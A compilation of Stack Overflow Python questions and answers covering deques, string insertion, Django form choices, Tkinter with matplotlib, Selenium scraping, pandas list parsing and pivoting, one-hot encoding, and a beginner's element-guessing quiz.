+ 10 mins. If things are happening more dynamically, you might use some kind of database structure to do this (not my area of expertise, but seems plausible path to pursue) and possible re-ask a similar question (with some more details) as a database or sqlite question.
Deque to keep last few minutes in Python
I'd like to keep the last 10 minutes of a time series in memory with some sort of deque system in Python. Right now I'm using deque but I may receive 100 data points in few seconds and then nothing for few seconds. Any idea ? I read something about FastRBTree in a post but it dated back to 2014. Is there any better solution now? I am mostly interested in computing the standard deviation over a fixed period of time, So the less data I receive within that fixed period of time, the less the standard deviation will be
[ "If you are concerned about container size, \"simplest\" thing might be to use the deque and just set a maxlen argument and then as it overflows, the oldest adds are just lost, but that does not guarantee 10 minutes worth obviously. But it is an efficient data structure for this.\nIf you want to \"trim by time in deque\" then you probably need to create a custom class that can hold the data and a timestamp of some kind and then periodically poll the end of the deque for the time of the earliest item and keep popping until you are no later than current time + 10 mins.\nIf things are happening more dynamically, you might use some kind of database structure to do this (not my area of expertise, but seems plausible path to pursue) and possible re-ask a similar question (with some more details) as a database or sqlite question.\n" ]
[ 0 ]
[]
[]
[ "deque", "python", "python_3.x" ]
stackoverflow_0074585486_deque_python_python_3.x.txt
Q: How to insert every nth charts in string? PYTHON I have a code, but I don't really know python, so I have a problem. I know that the insert isn't right for strings but I don't know how can I insert? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.insert(add_character) print("The string after inserting characters: " + str(original_string)) So I need help, how can I rewrite this? That's the homework for university and we haven't studied def so I can't use it A: Also I try to use .join, but now it prints original string, how can I print the string with joined chars? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.join(add_character) print("The string after inserting characters: " + str(original_string)) A: original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) new_string = "" for index, letter in enumerate(original_string): if index % slice == 0 and index != 0: new_string += add_character + letter else: new_string += letter print("The string after inserting characters: " + str(new_string)) Explanation: Strings are immutable so we'll have to create a new string to append to. So loop through the original string, take each letter and its index. If the index is a multiple of the slice, then add the character in add_character variable along with the letter, otherwise only append the letter. This will add the character at every multiple of the slice. I believe this is what the code was trying to achieve atleast, correct me if I'm wrong
How to insert every nth charts in string? PYTHON
I have a code, but I don't really know python, so I have a problem. I know that the insert isn't right for strings but I don't know how can I insert? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.insert(add_character) print("The string after inserting characters: " + str(original_string)) So I need help, how can I rewrite this? That's the homework for university and we haven't studied def so I can't use it
[ "Also I try to use .join, but now it prints original string, how can I print the string with joined chars?\n original_string = input(\"What's yout sentence?\")\n add_character = input(\"What char do you want to add?\")\n slice = int(input(\"What's the step?\"))\n \n for i in original_string[::slice]:\n original_string.join(add_character)\n \n\nprint(\"The string after inserting characters: \" + str(original_string))\n\n", "original_string = input(\"What's yout sentence?\")\nadd_character = input(\"What char do you want to add?\")\nslice = int(input(\"What's the step?\"))\n\nnew_string = \"\"\n\nfor index, letter in enumerate(original_string):\n if index % slice == 0 and index != 0:\n new_string += add_character + letter\n else:\n new_string += letter\n\nprint(\"The string after inserting characters: \" + str(new_string))\n\nExplanation: Strings are immutable so we'll have to create a new string to append to. So loop through the original string, take each letter and its index. If the index is a multiple of the slice, then add the character in add_character variable along with the letter, otherwise only append the letter. This will add the character at every multiple of the slice. I believe this is what the code was trying to achieve atleast, correct me if I'm wrong\n" ]
[ 0, 0 ]
[]
[]
[ "insert", "python", "string" ]
stackoverflow_0074592740_insert_python_string.txt
Q: using django, i want to show the user options to pick from with 'select' and a TextChoices model in my html template i have a select box where the user chooses the desired size of clothing like this <select> <option> Small </option> <option> Medium </option> <option> Large </option> </select> i want to display the options for the user to see. because i want to save the input in the database, to grab it, i was thinking of doing this: models.py class Product(models.Model): ... class Size(models.TextChoices): SMALL = 'S' MEDIUM = 'M' LARGE = 'L' size = models.CharField(max_length=3, choices=Size.choices, default=Size.LARGE) html <select> {% for size in product.size %} <option value="" name="{{ size }}"> {{ size }} </option> {% endfor %} </select> views.py def product(request, slug): product = get_object_or_404(Product, slug=slug) return render(request, 'product/product.html', {'product': product}) but i only get to display one value, which is the default value LARGE in my admin page, the 'Sizes' dropdown select for the product is showing perfectly with all 3 different values for the admin to pick did i choose the wrong method with 'TextChoices'? the html is not correct? am i missing something in views.py? all of the above? A: So... i found a way to do it... using django forms from django import forms from .models import Product class ClothingForm(forms.ModelForm): class Meta: model = Product fields = ['size'] views.py from .forms import ClothingForm def product(request, slug): product = get_object_or_404(Product, slug=slug) sizesForm = ClothingForm() return render(request, 'product/product.html', {'product': product, 'sizesForm': sizesForm}) html {{ sizesForm }} damn im dumb
using django, i want to show the user options to pick from with 'select' and a TextChoices model
in my html template i have a select box where the user chooses the desired size of clothing like this <select> <option> Small </option> <option> Medium </option> <option> Large </option> </select> i want to display the options for the user to see. because i want to save the input in the database, to grab it, i was thinking of doing this: models.py class Product(models.Model): ... class Size(models.TextChoices): SMALL = 'S' MEDIUM = 'M' LARGE = 'L' size = models.CharField(max_length=3, choices=Size.choices, default=Size.LARGE) html <select> {% for size in product.size %} <option value="" name="{{ size }}"> {{ size }} </option> {% endfor %} </select> views.py def product(request, slug): product = get_object_or_404(Product, slug=slug) return render(request, 'product/product.html', {'product': product}) but i only get to display one value, which is the default value LARGE in my admin page, the 'Sizes' dropdown select for the product is showing perfectly with all 3 different values for the admin to pick did i choose the wrong method with 'TextChoices'? the html is not correct? am i missing something in views.py? all of the above?
[ "So... i found a way to do it...\nusing django forms\nfrom django import forms\nfrom .models import Product\n\nclass ClothingForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = ['size']\n\nviews.py\nfrom .forms import ClothingForm\n\ndef product(request, slug):\n product = get_object_or_404(Product, slug=slug)\n sizesForm = ClothingForm()\n return render(request, 'product/product.html', {'product': product, 'sizesForm': sizesForm})\n\nhtml\n{{ sizesForm }}\n\ndamn im dumb\n" ]
[ 0 ]
[]
[]
[ "django", "django_models", "django_views", "python", "user_interface" ]
stackoverflow_0074587095_django_django_models_django_views_python_user_interface.txt
Q: Tkinter Button behaviour after matplotlib plt.show() I am writing a python tkinter-based GUI that should show Matplotlib-Plots in new Windows whenever I hit a button. Plots shall be non-exclusive, I want to be able to bring up as many Plots as I would like. (Original App has more than one button, I shortened it below) The Problem is: When I click one of my buttons the plot appears correctly. When I close the plot again the behaviour of the used button becomes spooky: at MacOS it appears pushed on Mouse-over at Windows it stays pushed for the rest of runtime On both OS'es it keeps working perfectly fine though. Only the graphics of the button are weird after first usage. I believe it has something to do with the running plt.show() blocking the GUI framework somehow, but I can not nail it down. class Simulator: def __init__(self) -> None: self.startGUI() def startGUI(self): self.window = tk.Tk() frmCol2 = tk.Frame(pady=10, padx=10) self.btnDraw = tk.Button(master = frmCol2, text="Draw Something", width=20) self.btnDraw.grid(row = 1, column = 1) self.btnDraw.bind("<Button-1>", self.drawSth) frmCol2.grid(row=1, column=2, sticky="N") self.window.mainloop() def drawSth(self, event): if self.btnDraw["state"] != "disabled": self.visualizer.plotSth(self.scenario) Plotting itself is then done by the object visualizer of the following class: class RadarVisualizer: def plotClutterVelocities(self, scenario): scArray = np.array(scenario) plt.figure() plt.plot(scArray[:,0], scArray[:,1]) plt.title("Some Title") plt.grid() plt.show() I checked the MPL Backend: It is TkAGG. I furthermore tried to put the plotting in a different thread which makes python crying a lot. It seems to expect the plots to be started in the same Thread. Maybe because the backend I am using is also Tkinter based. A: An example with many windows without plt.show(). Sample taken from here. import tkinter as tk import pandas as pd import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg i = 0 new_windows = [] data1 = {'country': ['A', 'B', 'C', 'D', 'E'], 'gdp_per_capita': [45000, 42000, 52000, 49000, 47000] } df1 = pd.DataFrame(data1) data2 = {'year': [1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010], 'unemployment_rate': [9.8, 12, 8, 7.2, 6.9, 7, 6.5, 6.2, 5.5, 6.3] } df2 = pd.DataFrame(data2) data3 = {'interest_rate': [5, 5.5, 6, 5.5, 5.25, 6.5, 7, 8, 7.5, 8.5], 'index_price': [1500, 1520, 1525, 1523, 1515, 1540, 1545, 1560, 1555, 1565] } df3 = pd.DataFrame(data3) def f_1(win): global df1 figure1 = plt.Figure(figsize=(6, 5), dpi=100) ax1 = figure1.add_subplot(111) bar1 = FigureCanvasTkAgg(figure1, win) bar1.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) df = df1[['country', 'gdp_per_capita']].groupby('country').sum() df.plot(kind='bar', legend=True, ax=ax1) ax1.set_title('Country Vs. GDP Per Capita') def f_2(win): global df2 figure2 = plt.Figure(figsize=(5, 4), dpi=100) ax2 = figure2.add_subplot(111) line2 = FigureCanvasTkAgg(figure2, win) line2.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) df = df2[['year', 'unemployment_rate']].groupby('year').sum() df.plot(kind='line', legend=True, ax=ax2, color='r', marker='o', fontsize=10) ax2.set_title('Year Vs. Unemployment Rate') def f_3(win): global df3 figure3 = plt.Figure(figsize=(5, 4), dpi=100) ax3 = figure3.add_subplot(111) ax3.scatter(df3['interest_rate'], df3['index_price'], color='g') scatter3 = FigureCanvasTkAgg(figure3, win) scatter3.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) ax3.legend(['index_price']) ax3.set_xlabel('Interest Rate') ax3.set_title('Interest Rate Vs. Index Price') def new_window(): global i new = tk.Toplevel(root) if i == 0: f_1(new) if i == 1: f_2(new) if i == 2: f_3(new) new_windows.append(new) i += 1 if i > 2: i = 0 root = tk.Tk() tk.Button(root, text='new_window', command=new_window).pack() root.mainloop()
Tkinter Button behaviour after matplotlib plt.show()
I am writing a python tkinter-based GUI that should show Matplotlib-Plots in new Windows whenever I hit a button. Plots shall be non-exclusive, I want to be able to bring up as many Plots as I would like. (Original App has more than one button, I shortened it below) The Problem is: When I click one of my buttons the plot appears correctly. When I close the plot again the behaviour of the used button becomes spooky: at MacOS it appears pushed on Mouse-over at Windows it stays pushed for the rest of runtime On both OS'es it keeps working perfectly fine though. Only the graphics of the button are weird after first usage. I believe it has something to do with the running plt.show() blocking the GUI framework somehow, but I can not nail it down. class Simulator: def __init__(self) -> None: self.startGUI() def startGUI(self): self.window = tk.Tk() frmCol2 = tk.Frame(pady=10, padx=10) self.btnDraw = tk.Button(master = frmCol2, text="Draw Something", width=20) self.btnDraw.grid(row = 1, column = 1) self.btnDraw.bind("<Button-1>", self.drawSth) frmCol2.grid(row=1, column=2, sticky="N") self.window.mainloop() def drawSth(self, event): if self.btnDraw["state"] != "disabled": self.visualizer.plotSth(self.scenario) Plotting itself is then done by the object visualizer of the following class: class RadarVisualizer: def plotClutterVelocities(self, scenario): scArray = np.array(scenario) plt.figure() plt.plot(scArray[:,0], scArray[:,1]) plt.title("Some Title") plt.grid() plt.show() I checked the MPL Backend: It is TkAGG. I furthermore tried to put the plotting in a different thread which makes python crying a lot. It seems to expect the plots to be started in the same Thread. Maybe because the backend I am using is also Tkinter based.
[ "An example with many windows without plt.show(). Sample taken from here.\nimport tkinter as tk\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n\ni = 0\nnew_windows = []\n\ndata1 = {'country': ['A', 'B', 'C', 'D', 'E'],\n 'gdp_per_capita': [45000, 42000, 52000, 49000, 47000]\n }\ndf1 = pd.DataFrame(data1)\n\ndata2 = {'year': [1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010],\n 'unemployment_rate': [9.8, 12, 8, 7.2, 6.9, 7, 6.5, 6.2, 5.5, 6.3]\n }\ndf2 = pd.DataFrame(data2)\n\ndata3 = {'interest_rate': [5, 5.5, 6, 5.5, 5.25, 6.5, 7, 8, 7.5, 8.5],\n 'index_price': [1500, 1520, 1525, 1523, 1515, 1540, 1545, 1560, 1555, 1565]\n }\ndf3 = pd.DataFrame(data3)\n\n\ndef f_1(win):\n global df1\n figure1 = plt.Figure(figsize=(6, 5), dpi=100)\n ax1 = figure1.add_subplot(111)\n bar1 = FigureCanvasTkAgg(figure1, win)\n bar1.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n df = df1[['country', 'gdp_per_capita']].groupby('country').sum()\n df.plot(kind='bar', legend=True, ax=ax1)\n ax1.set_title('Country Vs. GDP Per Capita')\n\n\ndef f_2(win):\n global df2\n figure2 = plt.Figure(figsize=(5, 4), dpi=100)\n ax2 = figure2.add_subplot(111)\n line2 = FigureCanvasTkAgg(figure2, win)\n line2.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n df = df2[['year', 'unemployment_rate']].groupby('year').sum()\n df.plot(kind='line', legend=True, ax=ax2, color='r', marker='o', fontsize=10)\n ax2.set_title('Year Vs. Unemployment Rate')\n\n\ndef f_3(win):\n global df3\n figure3 = plt.Figure(figsize=(5, 4), dpi=100)\n ax3 = figure3.add_subplot(111)\n ax3.scatter(df3['interest_rate'], df3['index_price'], color='g')\n scatter3 = FigureCanvasTkAgg(figure3, win)\n scatter3.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n ax3.legend(['index_price'])\n ax3.set_xlabel('Interest Rate')\n ax3.set_title('Interest Rate Vs. Index Price')\n\n\ndef new_window():\n global i\n new = tk.Toplevel(root)\n if i == 0:\n f_1(new)\n if i == 1:\n f_2(new)\n if i == 2:\n f_3(new)\n new_windows.append(new)\n i += 1\n if i > 2:\n i = 0\n\n\nroot = tk.Tk()\n\ntk.Button(root, text='new_window', command=new_window).pack()\n\nroot.mainloop()\n\n" ]
[ 1 ]
[]
[]
[ "matplotlib", "python", "tkinter" ]
stackoverflow_0074590539_matplotlib_python_tkinter.txt
Q: Web-Scraping using "requests" does not scrape the names/leaves out important information I tried following this approach to webscraping names of this specific website containing names I am interested in.: import requests URL = "https://bair.berkeley.edu/students.html" page = requests.get(URL) print(page.text) When executing, I however only get: The first of the people listed on that website in my print output When I inspect it in Chrome, it reads <span class="name">Elaine Angelino</span>. The printed page.text however only reads <span class="name"></span>. How can I fix that issue and get all ~500 students and their names? Any help is appreciated! I tried to find ways to extract html another way, but was not successful so far. A: As the name list of the webpage is populated by JavaScript, So you can use selenium with bs4. from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver from selenium.webdriver.chrome.service import Service import time webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://bair.berkeley.edu/students.html') driver.maximize_window() time.sleep(5) soup = BeautifulSoup(driver.page_source,"lxml") name_lst = [] for n in soup.select('.name'): name = n.get_text(strip=True) if n else None name_lst.append({'NAME':name}) df = pd.DataFrame(name_lst) print(df) Output: NAME 0 1 Yasin Abbasi-Yadkori 2 Pulkit Agrawal 3 Elaine Angelino 4 Khalid Ashraf .. ... 624 Rein Houthooft 625 Yanyan Lan 626 Erikson Nascimento 627 Tim G. J. Rudner 628 Markus Wulfmeier [629 rows x 1 columns]
Web-Scraping using "requests" does not scrape the names/leaves out important information
I tried following this approach to webscraping names of this specific website containing names I am interested in.: import requests URL = "https://bair.berkeley.edu/students.html" page = requests.get(URL) print(page.text) When executing, I however only get: The first of the people listed on that website in my print output When I inspect it in Chrome, it reads <span class="name">Elaine Angelino</span>. The printed page.text however only reads <span class="name"></span>. How can I fix that issue and get all ~500 students and their names? Any help is appreciated! I tried to find ways to extract html another way, but was not successful so far.
[ "As the name list of the webpage is populated by JavaScript, So you can use selenium with bs4.\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nimport time\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://bair.berkeley.edu/students.html')\ndriver.maximize_window()\ntime.sleep(5)\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nname_lst = []\n\nfor n in soup.select('.name'):\n name = n.get_text(strip=True) if n else None\n name_lst.append({'NAME':name})\n\ndf = pd.DataFrame(name_lst)\nprint(df)\n\nOutput:\n NAME\n0\n1 Yasin Abbasi-Yadkori\n2 Pulkit Agrawal\n3 Elaine Angelino\n4 Khalid Ashraf\n.. ...\n624 Rein Houthooft\n625 Yanyan Lan\n626 Erikson Nascimento\n627 Tim G. J. Rudner\n628 Markus Wulfmeier\n\n[629 rows x 1 columns]\n\n" ]
[ 1 ]
[]
[]
[ "beautifulsoup", "html", "python", "python_requests", "web_scraping" ]
stackoverflow_0074588610_beautifulsoup_html_python_python_requests_web_scraping.txt
Q: Incorrectly Reading a Column Containing Lists in Pandas I have a pandas data frame containing a column with a list that I am reading from a CSV. For example, the column in the CSV appears like so: ColName2007 ============= ['org1', 'org2'] ['org2', 'org3'] ... So, when I read this column into Pandas, each entry of the columns is treated as a string, rather than a list of strings. df['ColName2007'][0] returns "['org1', 'org2']". Notice this is being stored as a string, not a list of strings. I want to be able to perform list operations on this data. What is a good way to quickly and efficiently convert this column of strings into a column of lists that contain strings? A: I would use a strip/split : df['ColName2007']= df['ColName2007'].str.strip("[]").str.split(",") Otherwise, you can apply an ast.literal_eval as suggested by @Bjay Regmi in the comments. import ast df["ColName2007"] = df["ColName2007"].apply(ast.literal_eval)
Incorrectly Reading a Column Containing Lists in Pandas
I have a pandas data frame containing a column with a list that I am reading from a CSV. For example, the column in the CSV appears like so: ColName2007 ============= ['org1', 'org2'] ['org2', 'org3'] ... So, when I read this column into Pandas, each entry of the columns is treated as a string, rather than a list of strings. df['ColName2007'][0] returns "['org1', 'org2']". Notice this is being stored as a string, not a list of strings. I want to be able to perform list operations on this data. What is a good way to quickly and efficiently convert this column of strings into a column of lists that contain strings?
[ "I would use a strip/split :\ndf['ColName2007']= df['ColName2007'].str.strip(\"[]\").str.split(\",\")\n\nOtherwise, you can apply an ast.literal_eval as suggested by @Bjay Regmi in the comments.\nimport ast\n\ndf[\"ColName2007\"] = df[\"ColName2007\"].apply(ast.literal_eval)\n\n" ]
[ 1 ]
[]
[]
[ "list", "pandas", "python", "python_3.x", "string" ]
stackoverflow_0074592771_list_pandas_python_python_3.x_string.txt
Q: How to sort multiple columns' values from min to max, and put in new columns in pandas dataframe? I have a dataframe with datetime objects in columns 'start' . I want to sort these dates into new columns : evry time ID start to a new location with order df = pd.DataFrame(data={'ID':['a1','a2','a1','a1','a2','a2'], 'location':['bali','mosta','road','joha','alabama','vinice'], 'start':[pd.to_datetime('2022-11-18 16:28:35'), pd.to_datetime('2022-11-18 17:28:35'), pd.to_datetime('2022-11-19 16:28:35'), pd.to_datetime('2022-11-19 17:28:35'), pd.to_datetime('2022-11-19 17:18:35'), pd.to_datetime('2022-11-19 17:18:35') ]}) i want same yhinkg like that : new_data = pd.DataFrame(data={'ID':['a1','a2',], 'location1':['bali','mosta'], 'start1':[pd.to_datetime('2022-11-18 16:28:35'),pd.to_datetime('2022-11-18 17:28:35') ], 'location2':['road','alabama'], 'start2': [pd.to_datetime('2022-11-19 16:28:35'),pd.to_datetime('2022-11-19 17:18:35')], 'location3':['joha','vinice'], 'start3': [pd.to_datetime('2022-11-19 17:28:35'),pd.to_datetime('2022-11-19 17:18:35')], }) A: Try: df["tmp"] = df.groupby("ID").cumcount() + 1 df = df.pivot(index="ID", columns="tmp") df.columns = [f"{t}_{n}" for t, n in df.columns] df = df[sorted(df, key=lambda k: ((int((i := k.split("_"))[1])), i[0]))] print(df.reset_index()) Prints: ID location_1 start_1 location_2 start_2 location_3 start_3 0 a1 bali 2022-11-18 16:28:35 road 2022-11-19 16:28:35 joha 2022-11-19 17:28:35 1 a2 mosta 2022-11-18 17:28:35 alabama 2022-11-19 17:18:35 vinice 2022-11-19 17:18:35
How to sort multiple columns' values from min to max, and put in new columns in pandas dataframe?
I have a dataframe with datetime objects in columns 'start' . I want to sort these dates into new columns : evry time ID start to a new location with order df = pd.DataFrame(data={'ID':['a1','a2','a1','a1','a2','a2'], 'location':['bali','mosta','road','joha','alabama','vinice'], 'start':[pd.to_datetime('2022-11-18 16:28:35'), pd.to_datetime('2022-11-18 17:28:35'), pd.to_datetime('2022-11-19 16:28:35'), pd.to_datetime('2022-11-19 17:28:35'), pd.to_datetime('2022-11-19 17:18:35'), pd.to_datetime('2022-11-19 17:18:35') ]}) i want same yhinkg like that : new_data = pd.DataFrame(data={'ID':['a1','a2',], 'location1':['bali','mosta'], 'start1':[pd.to_datetime('2022-11-18 16:28:35'),pd.to_datetime('2022-11-18 17:28:35') ], 'location2':['road','alabama'], 'start2': [pd.to_datetime('2022-11-19 16:28:35'),pd.to_datetime('2022-11-19 17:18:35')], 'location3':['joha','vinice'], 'start3': [pd.to_datetime('2022-11-19 17:28:35'),pd.to_datetime('2022-11-19 17:18:35')], })
[ "Try:\ndf[\"tmp\"] = df.groupby(\"ID\").cumcount() + 1\ndf = df.pivot(index=\"ID\", columns=\"tmp\")\ndf.columns = [f\"{t}_{n}\" for t, n in df.columns]\ndf = df[sorted(df, key=lambda k: ((int((i := k.split(\"_\"))[1])), i[0]))]\nprint(df.reset_index())\n\nPrints:\n ID location_1 start_1 location_2 start_2 location_3 start_3\n0 a1 bali 2022-11-18 16:28:35 road 2022-11-19 16:28:35 joha 2022-11-19 17:28:35\n1 a2 mosta 2022-11-18 17:28:35 alabama 2022-11-19 17:18:35 vinice 2022-11-19 17:18:35\n\n" ]
[ 0 ]
[]
[]
[ "group_by", "numpy", "python", "sorteddictionary", "sorting" ]
stackoverflow_0074592822_group_by_numpy_python_sorteddictionary_sorting.txt
Q: Using One-Hot Encoding vector as a feature for machine learning models I have a categorical column ('session', than can get one of these values: [2,4,8]), that I want to use while training a machine learning model (like RandomForest or MLP). In order to do that, I encoded this feature using the One-Hot Encode method: df= pd.get_dummies(df, columns=["session"], prefix="Sessions") and I got three new columns: Session_2, Session_4, Session_8 instead of the old session column. Then I converted these new 3 columns into one vector (as a list) and populated 'session' column with that list: df['session'] = np.array(df[['Sessions_2', 'Sessions_4', 'Sessions_8']], dtype=object).tolist() So, now the data looks like: When trying to train the ML model I thought that it's better to use the new vector 'session' column and not the separated Session_x columns (otherwise, for what we did the one-hot encoding!) But I'm getting this error: ValueError: setting an array element with a sequence. I searched for that error, and everywhere it was mentioned that the root cause might be when the shape is not the same or the elements have different data types... but this is not the case in my case! I verified that all vectors have the same size and all have the same types! (I used as well dtype=object when creating the np array) I believe that the issue might be trying to load n-element array (sequence) into a single number slot which only has a float! I tried with 2 different ML models: RandomForest and MLP and still getting the same. How can I make my ML model work with the One-Hot encode vector? (is it the right approach at first place? to use a vector?) A: Your data frame already contains the one-hot encoding of the categorical feature, which literally is the combination of three existing columns, Session_2,4,8. No need of including that session column (object-type) as it is redundant and invalid.
Using One-Hot Encoding vector as a feature for machine learning models
I have a categorical column ('session', than can get one of these values: [2,4,8]), that I want to use while training a machine learning model (like RandomForest or MLP). In order to do that, I encoded this feature using the One-Hot Encode method: df= pd.get_dummies(df, columns=["session"], prefix="Sessions") and I got three new columns: Session_2, Session_4, Session_8 instead of the old session column. Then I converted these new 3 columns into one vector (as a list) and populated 'session' column with that list: df['session'] = np.array(df[['Sessions_2', 'Sessions_4', 'Sessions_8']], dtype=object).tolist() So, now the data looks like: When trying to train the ML model I thought that it's better to use the new vector 'session' column and not the separated Session_x columns (otherwise, for what we did the one-hot encoding!) But I'm getting this error: ValueError: setting an array element with a sequence. I searched for that error, and everywhere it was mentioned that the root cause might be when the shape is not the same or the elements have different data types... but this is not the case in my case! I verified that all vectors have the same size and all have the same types! (I used as well dtype=object when creating the np array) I believe that the issue might be trying to load n-element array (sequence) into a single number slot which only has a float! I tried with 2 different ML models: RandomForest and MLP and still getting the same. How can I make my ML model work with the One-Hot encode vector? (is it the right approach at first place? to use a vector?)
[ "Your data frame already contains the one-hot encoding of the categorical feature, which literally is the combination of three existing columns, Session_2,4,8. No need of including that session column (object-type) as it is redundant and invalid.\n" ]
[ 2 ]
[]
[]
[ "machine_learning", "one_hot_encoding", "python" ]
stackoverflow_0074592788_machine_learning_one_hot_encoding_python.txt
Q: Python: If input == variable is correct but result is incorrect I'm now currently learning Python because of school projects and I'm trying to make an element guessing game based on the info given. Sorry if my English is bad cause I'm not native English speaker. Also first time using this platform lol. This is the code import random #Element and description astatine = "Rarest naturally occurring element in the Earth crust" bromine = "Naturally occurring element that is a liquid at room temperature besides Mercury" bismuth = "Most naturally diamagnetic element" radon = "Densest noble gases" tungsten = "Has the highest melting point of all metals" radium = "Heaviest alkaline earth metal" caesium = "Most reactive metal" neodymium = "Strongest permanent magnet" fermium = "Heaviest element that can be formed by neutron bombardment of lighter elements" oganesson = "Highest atomic number of all known elements" #Listing out the variables list = [astatine, bromine, bismuth, radon, tungsten, radium, caesium, neodymium, fermium, oganesson] #Opening input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: randomdesc = random.choice(list) #Print the question print('↓↓↓\n' , '>>> ' , randomdesc , ' <<<') #Answer ans = str(input('Type your answer here → ')).lower #check if the answer is same as the element if ans == list: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break The problem I currenly facing is I have no idea how to check whether the answer typed is correct or not. Whatever i type, it always show "Incorrect, Press 1 to play again. Press Any key to exit program." My ideal result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Correct. Press 1 to play again. Press Any key to exit program thanks But instead the result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Incorrect, Press 1 to play again. Press Any key to exit program. thanks What I want is when lets say the question is "Most reactive metal", and i should type caesium. But the problem is when it comes to check the answer, the code should be if ans == the element chosen: But i couldn't find a way to fit that inside. If i put "if ans == list:" it will always be incorrect no matter what i type. Or there's anyway to make the variable able to check the equality (not only strings) such as "if ans == caesium:" but the result is also same as previous one. Or is there a way to reverse the variables and strings such as caesium = "Most reactive metal" into "Most reactive metal" = caesium Conclusion, I stucked at the "if ans == something else:" part and i need to find a way to make it work so if the answer is correct, it will show "Correct. Press 1 to play again. Press Any key to exit program" and if the answer is wrong then it's the opposite. Thank you if you are willing to help <3 A: You have several misunderstandings here. You can't use the name of a variable as a string. What you need is a dictionary, where both key and value are strings. Next, you were using ...).lower, but without the parentheses, so the result was the lower function object, not the result of calling the function. This does what you want: import random elements = { "astatine": "Rarest naturally occurring element in the Earth crust", "bromine": "Naturally occurring element that is a liquid at room temperature besides Mercury", "bismuth": "Most naturally diamagnetic element", "radon": "Densest noble gases", "tungsten": "Has the highest melting point of all metals", "radium": "Heaviest alkaline earth metal", "caesium": "Most reactive metal", "neodymium": "Strongest permanent magnet", "fermium": "Heaviest element that can be formed by neutron bombardment of lighter elements", "oganesson": "Highest atomic number of all known elements" } input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: elem = random.choice(list(elements)) print(elem) print('↓↓↓\n' , '>>> ' , elements[elem] , ' <<<') ans = input('Type your answer here → ').lower() #check if the answer is same as the element if ans == elem: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break
Python: If input == variable is correct but result is incorrect
I'm now currently learning Python because of school projects and I'm trying to make an element guessing game based on the info given. Sorry if my English is bad cause I'm not native English speaker. Also first time using this platform lol. This is the code import random #Element and description astatine = "Rarest naturally occurring element in the Earth crust" bromine = "Naturally occurring element that is a liquid at room temperature besides Mercury" bismuth = "Most naturally diamagnetic element" radon = "Densest noble gases" tungsten = "Has the highest melting point of all metals" radium = "Heaviest alkaline earth metal" caesium = "Most reactive metal" neodymium = "Strongest permanent magnet" fermium = "Heaviest element that can be formed by neutron bombardment of lighter elements" oganesson = "Highest atomic number of all known elements" #Listing out the variables list = [astatine, bromine, bismuth, radon, tungsten, radium, caesium, neodymium, fermium, oganesson] #Opening input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: randomdesc = random.choice(list) #Print the question print('↓↓↓\n' , '>>> ' , randomdesc , ' <<<') #Answer ans = str(input('Type your answer here → ')).lower #check if the answer is same as the element if ans == list: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break The problem I currenly facing is I have no idea how to check whether the answer typed is correct or not. Whatever i type, it always show "Incorrect, Press 1 to play again. Press Any key to exit program." My ideal result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Correct. Press 1 to play again. Press Any key to exit program thanks But instead the result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Incorrect, Press 1 to play again. Press Any key to exit program. thanks What I want is when lets say the question is "Most reactive metal", and i should type caesium. But the problem is when it comes to check the answer, the code should be if ans == the element chosen: But i couldn't find a way to fit that inside. If i put "if ans == list:" it will always be incorrect no matter what i type. Or there's anyway to make the variable able to check the equality (not only strings) such as "if ans == caesium:" but the result is also same as previous one. Or is there a way to reverse the variables and strings such as caesium = "Most reactive metal" into "Most reactive metal" = caesium Conclusion, I stucked at the "if ans == something else:" part and i need to find a way to make it work so if the answer is correct, it will show "Correct. Press 1 to play again. Press Any key to exit program" and if the answer is wrong then it's the opposite. Thank you if you are willing to help <3
